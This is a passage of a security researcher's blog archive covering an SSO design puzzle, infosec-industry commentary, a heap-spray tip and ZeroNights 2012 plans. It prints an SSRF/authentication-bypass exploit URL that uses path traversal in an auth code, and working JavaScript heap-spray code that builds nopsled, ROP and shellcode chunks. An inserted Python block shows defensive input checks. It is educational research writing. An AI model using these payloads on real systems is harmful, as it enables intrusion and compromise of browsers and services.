<span id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;">1.6. The </span>SSO<span style="font-weight: normal;"> server asks for the login and password in a pop-up. Standard authentication in a POST request to </span>SSO<span style="font-weight: normal;">, I won't give an example. Everything is standard. If the login (don_huan, for example) and password are correct, this session is considered authenticated. If not, goto 2.6. (captcha and CSRF tokens are in place, in case you wondered)</span></span></span></div>
<span id="internal-source-marker_0.3253475003875792">
</span>
<br />
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">1.7. The code is registered and written to the session, and it is checked that such an ID exists. If anything is wrong - error. <br class="kix-line-break" />1.8 goto 1.3</span></span></div>
<span id="internal-source-marker_0.3253475003875792"></span><br />
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span id="internal-source-marker_0.3253475003875792"><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">
2. Authentication - verification.</span></span></div>
<span id="internal-source-marker_0.3253475003875792">
<div dir="ltr" style="font-weight: bold; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;">2.1. <code> is taken from the cookie as is, and a REST API request is generated from server S1 to </span>SSO<span style="font-weight: normal;"> (not visible to the user), the URL of which is signed with the own secret key of server </span>S1<span style="font-weight: normal;">:<br class="kix-line-break" /><br class="kix-line-break" />GET https://sso.domain.com/api/check/<code> HTTP/1.1<br class="kix-line-break" />…<br class="kix-line-break" />Header-Signature: ashJiTfV537Gfcf64f8hg4FgDkkkA785F5g/hjkR4Ed==<br class="kix-line-break" />Header-ID: S1<br class="kix-line-break" />Header-Data: “https://sso.domain.com/api/check/<code>”</span></span></div>
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">…</span></div>
<div dir="ltr" style="font-weight: bold; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;"><br class="kix-line-break" />2.3. The </span>SSO<span style="font-weight: normal;"> server verifies the signature using the registered public key of S1. It checks the Header-Signature signature over Header-Data; if anything is wrong, an error is returned; if everything is correct, processing continues.</span></span></div>
<div dir="ltr" style="font-weight: bold; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;">2.4. The handler script on </span>SSO<span style="font-weight: normal;"> (/api/check/) checks that &lt;code&gt; is registered; if not, an error is returned, otherwise processing continues.</span></span></div>
<div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">2.5. JSON is returned:</span></div>
<span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span><br /><div dir="ltr" style="font-weight: normal; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">{registered_user:”don_huan”}</span></div>
<span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span id="internal-source-marker_0.3253475003875792"><div dir="ltr" style="font-weight: bold; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><span style="font-weight: normal;">2.6 Server </span>S1<span style="font-weight: normal;"> reads the JSON response and gives the user their personal data for registered_user. Or an error, if there is no such user.<br class="kix-line-break" /><br class="kix-line-break" /><br class="kix-line-break" />--------</span></span></div>
<span style="font-family: Arial; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"></span><br /><span style="vertical-align: baseline;"><span style="font-family: Arial; font-weight: bold;"><span style="font-size: 15px; font-weight: normal; white-space: pre-wrap;">That's about it. In principle the attack is obvious, but... what an effect! If you have questions, write in the comments and I'll answer 8) Post your variants too. A reminder: this was a real case of a real attack, not just a theoretical exercise. Also, once the answer is found, it would be interesting to hear how this can be classified and what the vulnerabilities were. By the way, this is an example of a vulnerability that I found simply by reading the documentation 8)
P.S. All coincidences are accidental. In reality OAuth was used there, but I was too lazy to describe the OAuth algorithms in this manner, so I heavily simplified everything in this documentation and </span></span><span style="font-family: Arial;"><span style="font-size: 15.199999809265137px; white-space: pre-wrap;">architecture</span></span><span style="font-family: Arial; font-weight: bold;"><span style="font-size: 15px; font-weight: normal; white-space: pre-wrap;"> - the simpler the better ;)</span></span></span></span></span><br />
<div>
<span style="vertical-align: baseline;"><span style="font-family: Arial; font-weight: bold;"><span style="font-size: 15px; font-weight: normal; white-space: pre-wrap;"><br /></span></span></span></div>
<div>
<span style="vertical-align: baseline;"><span style="font-family: Arial;"><span style="font-size: 15px; white-space: pre-wrap;"><b>UPD</b></span></span></span></div>
<div>
<span style="vertical-align: baseline;"><span style="font-family: Arial;"><span style="font-size: 15px; white-space: pre-wrap;"><b><br /></b></span></span></span></div>
<div>
<span style="font-family: Arial;"><span style="font-size: 15.199999809265137px; white-space: pre-wrap;">The task was solved without any problems by </span></span><a href="http://www.blogger.com/profile/16918471305442707785" rel="nofollow" style="background-color: #fff9ee; color: #888888; font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 14px; font-weight: bold; line-height: 19px; text-decoration: initial;">i Sciurus</a><span style="font-family: Arial; font-size: 15.199999809265137px; white-space: pre-wrap;">.</span><br />
<span style="font-family: Arial;"><span style="font-size: 15.199999809265137px; white-space: pre-wrap;">
Exploit: </span></span></div>
<div>
<span style="background-color: #fff9ee; color: #222222; font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 14px; line-height: 19px; text-align: justify;">3.1 Authentication bypass</span></div>
<span style="background-color: #fff9ee; color: #222222; font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 14px; line-height: 19px; text-align: justify;">https://s1.domain.com/authDone?code=../../?afterauth=http://s1.domain.com%3Furl=http://my.domain/get_any_json</span><br />
<div>
<span style="background-color: #fff9ee; color: #222222; font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 14px; line-height: 19px; text-align: justify;"><br /></span></div>
<div style="text-align: justify;">
<span style="color: #222222; font-family: Georgia, Utopia, Palatino Linotype, Palatino, serif;"><span style="font-size: 14.399999618530273px; line-height: 19px;">Here is such an interesting and, above all, simple and powerful SSRF attack. Where is the mistake?<br /><br />1. The REST API works over GET requests</span></span></div>
<div style="text-align: justify;">
<span style="color: #222222; font-family: Georgia, Utopia, Palatino Linotype, Palatino, serif;"><span style="font-size: 14.399999618530273px; line-height: 19px;">---> So what? All requests are signed! Nobody can poke into this API; it is closed to the Internet and open only to legitimate services.</span><br /><span style="font-size: 14.399999618530273px; line-height: 19px;">2. The token value is not filtered: &gt;&lt;/../?= etc.</span><br /><span style="font-size: 14.399999618530273px; line-height: 19px;">---> And why filter it? What vulnerability is there? The token "*&amp;%&lt;xss.&gt;\'SQL111" will simply return the error {error:'not found'}. No vector. </span><br /><span style="font-size: 14.399999618530273px; line-height: 19px;">3. Redirect/OpenRedirect</span><br /><span style="font-size: 14.399999618530273px; line-height: 19px;">---> low priority, a client-side attack.</span><br /><span style="font-size: 14.399999618530273px; line-height: 19px;">4. S1 follows HTTP redirects, which allows it to be bounced to another host.</span></span></div>
<div style="text-align: justify;">
<span style="color: #222222; font-family: Georgia, Utopia, Palatino Linotype, Palatino, serif;"><span style="font-size: 14.399999618530273px; line-height: 19px;">---> But the redirect comes from SSO, which the attacker does not control</span></span></div>
<div style="text-align: justify;">
<span style="color: #222222; font-family: Georgia, Utopia, Palatino Linotype, Palatino, serif;"><br /><span style="font-size: 14.399999618530273px; line-height: 19px;">So taken individually these are all low-grade bugs, and even </span><b style="font-size: 14.399999618530273px; line-height: 19px;">not vulnerabilities at all (</b><span style="font-size: 14.399999618530273px; line-height: 19px;">except the redirect</span><b style="font-size: 14.399999618530273px; line-height: 19px;">)</b><span style="font-size: 14.399999618530273px; line-height: 19px;">, just functional trifles. But all together they make an attack, with quite substantial damage. The SSRF here involves no XXE/RFI at all, as Andrey said, and no wrappers </span><strike style="font-size: 14.399999618530273px; line-height: 19px;">of Vladimir's </strike><span style="font-size: 14.399999618530273px; line-height: 19px;"> (Volodya has a superb doc where this topic is covered not only vertically but also horizontally, which makes it extremely useful; I recommend it - </span><span style="font-size: 14.399999618530273px; line-height: 19px;"><a href="https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit#">https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit#</a> </span></span><span style="color: #222222; font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 14.399999618530273px; line-height: 19px;">)</span><span style="color: #222222; font-family: Georgia, Utopia, 'Palatino Linotype', Palatino, serif; font-size: 14.399999618530273px; line-height: 19px;">. Moreover, the request was signed in the first place! And third, when carrying out the attack directly, the target host cannot be changed (this became possible only with the help of two redirects). </span></div>
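<div>
The S1-side checks that break this chain, as an added Python example (not code from the original post or from the system it describes). The token alphabet in TOKEN_RE, the sample token and all function names are assumptions; the endpoint and the attack string are the ones given above.
</div>

```python
import json
import posixpath
import re
import urllib.request
from urllib.parse import quote, unquote, urlsplit

SSO_HOST = "sso.domain.com"
CHECK_PREFIX = "/api/check"                      # endpoint named in the post
SSO_BASE = "https://" + SSO_HOST + CHECK_PREFIX + "/"
TOKEN_RE = re.compile(r"[A-Za-z0-9_-]{8,128}")   # assumed token alphabet


def naive_check_url(code):
    """Step 2.1 as described: the cookie value is appended as is."""
    return SSO_BASE + code


def effective_target(url):
    """Host, normalised path and query that the receiving server routes on."""
    parts = urlsplit(url)
    path = posixpath.normpath(unquote(parts.path))
    return parts.hostname, path, parts.query


def safe_check_url(code):
    """Build the check URL only for a well-formed token, then re-verify it."""
    if not TOKEN_RE.fullmatch(code):
        raise ValueError("malformed auth code")
    url = SSO_BASE + quote(code, safe="")        # one path segment, nothing else
    host, path, query = effective_target(url)
    if host != SSO_HOST or query or posixpath.dirname(path) != CHECK_PREFIX:
        raise ValueError("check URL escaped " + CHECK_PREFIX)
    return url                                   # sign and send only this value


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Returning None makes urllib raise HTTPError on a 3xx instead of following it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def build_check_opener():
    """Opener for the server-to-server call: redirects are never followed."""
    return urllib.request.build_opener(NoRedirect)


def parse_check_response(status, final_url, body):
    """Accept the JSON only from a direct 200 answer of the check endpoint."""
    host, path, _ = effective_target(final_url)
    if status != 200 or host != SSO_HOST or posixpath.dirname(path) != CHECK_PREFIX:
        raise ValueError("unexpected answer to check request")
    data = json.loads(body)
    user = data.get("registered_user") if isinstance(data, dict) else None
    if not isinstance(user, str) or not user:
        raise ValueError("no registered_user in response")
    return user


# The value from the exploit above. The signature in step 2.1 does not help,
# because S1 signs whatever URL it has just built from this input.
ATTACK_CODE = "../../?afterauth=http://s1.domain.com%3Furl=http://my.domain/get_any_json"

if __name__ == "__main__":
    print(effective_target(naive_check_url(ATTACK_CODE)))
    try:
        safe_check_url(ATTACK_CODE)
    except ValueError as exc:
        print("rejected:", exc)
    print(safe_check_url("Zm9vYmFyMTIzNDU2"))    # constructed sample token
```
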
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com14tag:blogger.com,1999:blog-4711612808026791519.post-12623546703007765972012-11-28T08:26:00.000-08:002012-11-28T08:36:00.174-08:00On the subject of the round table...<div dir="ltr" style="text-align: left;" trbidi="on">
Well, the beginning of the end of this blog is coming soon 8) Nevertheless, sometimes I get carried away... yes, I should keep quiet, but sometimes there is nobody to stop me, so here is a blog entry on the subject of researchers, developers, bug hunters and the infosec industry...<br />
<br />
Preamble.<br />
<br />
At the recent #Zeronights conference this topic was given its own "round table" track, but the topic arose long ago and has already been chewed over at Toxa's and on RISSPA:<br />
<br />
<br />
<ul style="text-align: left;">
<li><a href="http://toxa.livejournal.com/552663.html">http://toxa.livejournal.com/552663.html</a></li>
<li><a href="http://www.linkedin.com/groups/DSEC-ERPScan-%D0%BD%D0%B0-Black-Hat-3189141.S.181404786">http://www.linkedin.com/groups/DSEC-ERPScan-%D0%BD%D0%B0-Black-Hat-3189141.S.181404786</a> (not for the faint of heart)</li>
</ul>
<div>
Stream.<br />
<br />
In the context of this story - <a class="twitter-timeline-link" data-expanded-url="http://www.xakep.ru/post/59715/" dir="ltr" href="http://t.co/Bhbbw8Or" style="background-color: #f6f6f6; color: #0084b4; font-family: Arial, sans-serif; font-size: 14.399999618530273px; line-height: 18px; text-decoration: initial;" target="_blank" title="http://www.xakep.ru/post/59715/"><span class="js-display-url" style="background-color: #f6f6f6; color: #0084b4; font-family: Arial, sans-serif; font-size: 14.399999618530273px; line-height: 18px; text-decoration: initial;">xakep.ru/post/59715/</span><span style="color: #0084b4; font-family: Arial, sans-serif;"><span class="invisible" style="background-color: #f6f6f6; font-size: 0px; line-height: 0; line-height: 0;"></span></span><span class="tco-ellipsis" style="background-color: #f6f6f6; color: #0084b4; font-family: Arial, sans-serif; font-size: 14.399999618530273px; line-height: 18px; text-decoration: initial;"><span class="invisible" style="font-size: 0px; line-height: 0;"> </span></span></a> all of this is easily explained. What is research done for? If you answer this question honestly and impartially, it becomes clear that most research is useless, because its goals interest only a narrow circle of people. In general, the infosec industry is a narrow circle of people, and the market there is "subsistence farming". Who are the infosec people? Let's take Toxa's system:<br />
<br />
1) Infosec managers in companies.<br />
2) Researchers - bug hunters.<br />
3) Infosec vendors<br />
4) Regulators<br />
<br />
And what do we get? That the system is closed. Researchers pose as hackers, find an XSS, brag about it, and create a pretext for the infosec manager to buy what the infosec vendor has produced. And then there are the regulators, who bluntly say: everyone must buy and spend money, otherwise the market will die 8) For 90% of the market this is how it is (subjective opinion). It is a dead end. A failure. As a result we have tons of crap PR from researchers who want their cut, and infosec vendors who have built themselves into the system. So what about the researchers in the end? They also come in different kinds: some do research for fun, some for PR and business, some for a real goal - to break into something. In that last case the research is at least justified. A person wants to break something, does the research, finds a bug, a method, an attack vector, breaks it and gets a real benefit. And for fun? See the example with the electronic locks. The guy had his fun, took a trip to Las Vegas, and that was all. The thieves got the benefit. Everyone else (developers, owners) got only damage. IMHO: such research would have been useful only <b>during the development process</b>.<br />
<br />
Conclusion.<br />
<br />
Infosec research detached from the development and operations process is useless. Yes, you found 100 bugs, well, 1000, so what? There will be another 1000 after you; others will find them too. Chasing numbers or PR is cool, but it will do the universe no good. The relevance of some research is also a big question. The infosec industry, especially in Russia (though in the West the idea is actually about the same, only slightly further along in development), is a pitiful sight; there are individual exceptions, but on the whole, taken together, it is a dreary branch for raking in cash. Before the 200x years it was more fun: back then people did research for real profit and kicks, and this pushed everyone to improve defenses and develop processes, but now everything has stalled.<br />
<br />
I don't claim that everything said here is true, or that I will think the same way after some time, but I am sure that infosec detached from developers, processes and operations is just saber-rattling. Consultants, integrators, regulators are just elements of the system, sometimes even parasitic ones 8)</div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com4tag:blogger.com,1999:blog-4711612808026791519.post-64925380254544534422012-11-23T04:47:00.001-08:002012-11-23T04:47:11.194-08:00HeapSpray<div dir="ltr" style="text-align: left;" trbidi="on">
A mini blog entry about heap spray.<br /><br />
It's funny, but on the Internets people talk about all sorts of Bubble and Nozzle, in particular with regard to FF and IE9. After reading the following blogs:<br />
<br />
https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/<br />
http://www.greyhathacker.net/?p=549<br />
<br />
... I was convinced of the effectiveness of these methods and even talked about it at the workshop, but today I wanted to determine the HeapSpray detection threshold. And then I realized that the true reason why all these methods from the blogs work is not that they add random code at the beginning of the string and fool complex algorithms, but that there is concatenation in a loop. In other words, there is no need to complicate the code and add a counter or non-assembler instructions and so on. Concatenation is enough! It's all simple, don't complicate your life ;)<br />
<br />
P.S. Please consider this an addition to the workshop, where Corelan's method was covered. Now the working code for HeapSpray is much simpler (the greyhathacker.net basic variant):<br />
<br />
<br />
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
var heap_chunks;</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
function heapSpray(rop,shellcode,nopsled)</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
{</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
var chunk_size, headersize, nopsled_len, code;</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
var i, codewithnum;</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
log.innerHTML+="<br><b>Stage 2. HeapSpraay...";</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
chunk_size = 0x40000;</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
headersize = 0x10;</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
nopsled_len = chunk_size - (headersize + rop.length + shellcode.length);</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
while (nopsled.length < nopsled_len)</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
nopsled += nopsled;</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
nopsled = nopsled.substring(0, nopsled_len);</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
code = nopsled + rop + shellcode; </div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
heap_chunks = new Array();</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
for (i = 0 ; i < 1000 ; i++)</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
{</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
codewithnum = "HERE" + code;</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
heap_chunks[i] = codewithnum.substring(0, codewithnum.length);</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
}</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
}</div>
</li>
</ol>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com5tag:blogger.com,1999:blog-4711612808026791519.post-83064085658370152252012-10-12T09:07:00.000-07:002013-06-07T16:16:07.020-07:00ZeroNights 2012<div dir="ltr" style="text-align: left;" trbidi="on">
In the run-up to <b>Zeronights Episode 0x02</b>, I would like to share the work I have done for this conference and my thoughts on it. Inside info.<br />
<div>
<br /></div>
<div>
I am, of course, a co-organizer, but what does that mean? Mostly that you tell the other organizers your vision of what should be and how, listen to the others or argue with them. In the end you all make a decision together and do everything according to the plan. Honestly, running conferences is hell. A thankless job. You can't please everyone, not just the attendees but even your own colleagues. There were many contentious points, for example about launching this very second episode in Moscow, and there were disputes on other topics where the organizers' opinions diverged, but I won't write about that here; I'll talk about the practical part of the work and the experience I gained.</div>
<div>
<br />
<br /></div>
<div>
<b>CFP</b></div>
<div>
<br /></div>
<div>
I got the role of panel admin. I was there last year too, but the panel has changed a lot. While last year there were well-known personalities from around the world to whom we sent the submissions and waited for feedback, this year everything was different. Last year it was a bit dumb: you send people a bundle of texts and wait... and wait... not very dynamic. Then not everyone sent everything in on time, and some forgot altogether 8) So I didn't like doing it by email. This year the CFP was 'online', right in Google Docs. Everyone could comment on a given talk in their own column and give it a color rating. Pretty, clear and effective. Who did the rating? All those who take part in the life of DCG#7812. Whoever responded in the group (not many, by the way), whoever wanted to influence the list of talks, could do so and did. I won't name names; whoever wants to will own up themselves ) But mostly these are names familiar to all of us, the best representatives of the Russian white-hat scene, so to speak. The advantages are obvious: a live discussion, and each reviewer has experience in their own area, so both web and binary topics were judged on their merits by pros.<br />
<br />
We received ~60 submissions. And this time there were many Russians! That is encouraging, so: a patriotic moment, the percentage of submissions from researchers by geography (Fast Track is not included in the statistics)!<br />
<br />
<br />
<ul style="text-align: left;">
<li>CIS - 44%</li>
<li>Abroad - 56%</li>
</ul>
<br />
In fact these figures are simply wonderful. I am proud of how active our people are. This is right. And now the hit rate: the same thing, but only for accepted talks...<br />
<br />
<br />
<br />
<ul style="text-align: left;">
<li>CIS - 49%</li>
<li>Abroad - 51% </li>
</ul>
<br />
This says that the submissions on the whole were roughly equal; perhaps the domestic content was even slightly higher in quality (in the committee's opinion). I think that is right: the conference is our own, domestic, and many prepared something specifically for it. Unfortunately there are not that many new faces among the Russian submissions. That is sad. On the other hand, it's stable ;)<br />
<br />
<b>Workshop</b><br />
<br />
Now about my content. I decided to try my hand at creating a workshop. The workshop is on exploit development for Win7 on x32, with a focus on browsers, using IE9 as the example. We will go from a simple BoF exploit to a complex BoF exploit that bypasses DEP, ASLR, GS /safeSEH. We will bypass ASLR in two ways (including a look at how a BoF can be used to leak an address from an ASLR module, followed by building a ROP chain from the leaked base address). We will also touch on Use-After-Free bugs and their exploitation in the same environment, again with a specific example of how to "hijack" addresses to bypass ASLR. My point is that it won't be just the banal "and now we bypass ASLR because our module is compiled without ASLR support", although we will cover that case too. We will also talk about HeapSpray. I MUST fit all this into 5 hours. Not an easy task. I already tried my hand with a smaller amount of material in September at the DCG meetup, and it went hard, especially with a lot of people 8( So I won't fully chew over the basic questions of exploit writing. By the way, apparently my workshop will be on the second day of the conference, and on the first day there will be a similar workshop (4 hours) by <b>Rick Flores</b> of Rapid7, focused on Metasploit and the basics. Yes... the program will be packed... I don't even know what I would do... I'd want to go to the workshop and listen to the talks too.. damn, and then there are the contests...<br />
<br />
<b>Contest</b><br />
<b><br /></b>
Last year I wrote one level for the Zeronights Hack-Quest, which was run by ONsec, a simple level with AES-CBC. Many people passed it, judging by the write-ups, which is not bad 8) This year my friends and I decided to put together a small hack quest. It will take place as part of the conference. It starts on the first day.... and goes on to the bitter end. It will be a race. The first two finalists will receive valuable prizes from <span style="color: #0b5394;"><b>NOKIA</b></span>. It is not only about security topics but also about ingenuity 8) The first part won't be tied to security at all. We wanted to create a SIMPLE but interesting hack quest that would not distract too much from the main program. But at the end you will have to write some exploits, so...<br />
<br />
As you understand, there will be plenty more of interest at the conference; for example, what I personally would highlight:<br />
<br />
We have already talked about workshops, but there will be MANY of them and they will be cool; FAR from the whole program has been published yet, but from what is already available, besides <b>Rick Flores</b>, there will be a curious workshop about RFID - <a href="http://2012.zeronights.ru/workshop#salamatin-cumanov">http://2012.zeronights.ru/workshop#salamatin-cumanov</a> . This is definitely worth attending; besides that, the talks on the security of aviation systems (<a href="http://2012.zeronights.ru/program#kostin">http://2012.zeronights.ru/program#kostin</a>) and Ruby (<a href="http://2012.zeronights.ru/program#joernchen">http://2012.zeronights.ru/program#joernchen</a>) arouse my genuine interest, not to mention that <b>Vladimir Vorontsov</b> and <b>Alexander Golovko</b> have decided to reveal 0-day techniques to us in their talk - <a href="http://2012.zeronights.ru/program#vorontsov-golovko">http://2012.zeronights.ru/program#vorontsov-golovko</a> . <b>Nikita</b>'s topic on NFC and EMV security also promises to be interesting - <a href="http://2012.zeronights.ru/program#abdullin">http://2012.zeronights.ru/program#abdullin</a>. And that is not everything I would like to get to. Being an "organizer" is tiring and there won't always be a chance to run around the talks 8(( But the program has turned out simply excellent, in my opinion. And that's given that there is another batch of talks that are not public yet and are being prepared for publication on the site... there is so much more tasty stuff there; I hope these names mean something to you: <b>Solar Designer</b>, <b>Alisa Esage</b>, <b>Nikita Tarakanov</b>... yes, no snot, only meat! No personal data and whining about regulators and paperwork! No kindergarten topics to please the suits and no dirty PR built on the masses not understanding the subject! Only research, technology, clever tricks and hacks, real defense and real attacks on what we use at home or at work.<br />
<br />
(Turned out to be a rather patriotic post... hmmm...)<br />
<br /></div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com3tag:blogger.com,1999:blog-4711612808026791519.post-18289978228137249342012-06-21T10:39:00.001-07:002012-06-21T11:18:04.975-07:00The cost of an exploit...<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Arial, Helvetica, sans-serif;">I just read this news item: <a href="http://www.securitylab.ru/news/426076.php">http://www.securitylab.ru/news/426076.php</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">The gist:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div style="text-align: left;">
<span style="font-family: Times, 'Times New Roman', serif;">"A certain <span style="background-color: white; font-size: 15px; text-align: -webkit-auto;">Jonathan Ness, an information security manager at Trustworthy Computing (one of Microsoft's divisions), stated that the software giant is developing methods to reduce the number of attacks that use exploits by increasing the costs required to discover and use vulnerabilities.</span></span></div>
<div style="font-size: 15px; text-align: left;">
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span></div>
<div style="font-size: 15px; text-align: left;">
